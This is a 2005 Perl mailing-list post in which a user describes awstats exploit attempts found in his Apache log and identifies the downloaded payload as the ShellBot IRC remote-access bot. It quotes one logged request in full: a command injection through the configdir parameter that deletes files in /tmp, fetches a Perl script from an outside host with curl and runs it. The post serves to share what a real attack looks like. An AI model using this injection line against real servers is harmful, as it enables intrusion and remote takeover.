[Israel.pm] Facing awstats exploit

Mikhael Goikhman migo at homemail.com
Fri Oct 21 16:05:59 PDT 2005


This is not news, just wanted to share some curious information, and it
is perl related. I noticed, my apache log is full of requests:

  GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| HTTP/1.1

It exploits a hole in awstats using such ancient trick (it was fixed
earlier this year). Bad the developers were that sloppy.

The exploit (a.pl, that may be downloaded) is also written in perl.
This is ShellBot, that seems to be a full-featured irc bot providing
remote access to the system.

Interestingly, googling for "kidk1d" gives no results.
But "awstats exploit configdir" does.

Regards,
Mikhael.

-- 
perl -e 'print+chr(64+hex)for+split//,d9b815c07f9b8d1e'



More information about the Perl mailing list